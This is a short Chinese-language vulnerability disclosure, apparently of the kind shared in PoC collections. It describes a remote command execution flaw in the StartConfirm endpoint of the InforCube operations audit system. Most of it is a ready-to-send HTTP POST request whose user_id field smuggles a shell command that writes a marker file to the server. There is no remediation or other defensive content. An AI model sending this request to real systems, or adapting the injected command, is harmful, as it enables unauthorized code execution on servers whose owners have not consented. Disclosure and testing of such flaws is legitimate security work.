漏洞描述
远程命令执行漏洞是指攻击者通过构造特定的请求,使得服务器端执行非预期的命令,从而可能导致未授权的数据访问、权限提升、服务中断等严重后果。这种漏洞通常由于应用程序对用户输入的验证不充分或者对外部命令调用缺乏必要的安全控制而产生。
InforCube运维管理审计系统 StartConfirm 远程命令执行漏洞
PoC代码
POST /default/StartConfirm/ HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
username=1&user_id=;echo 57a0f6cd8679d6182e31d871a9779f00>vspnarxf.txt;&google_key_dec=1&safety_code1=1&safety_code2=1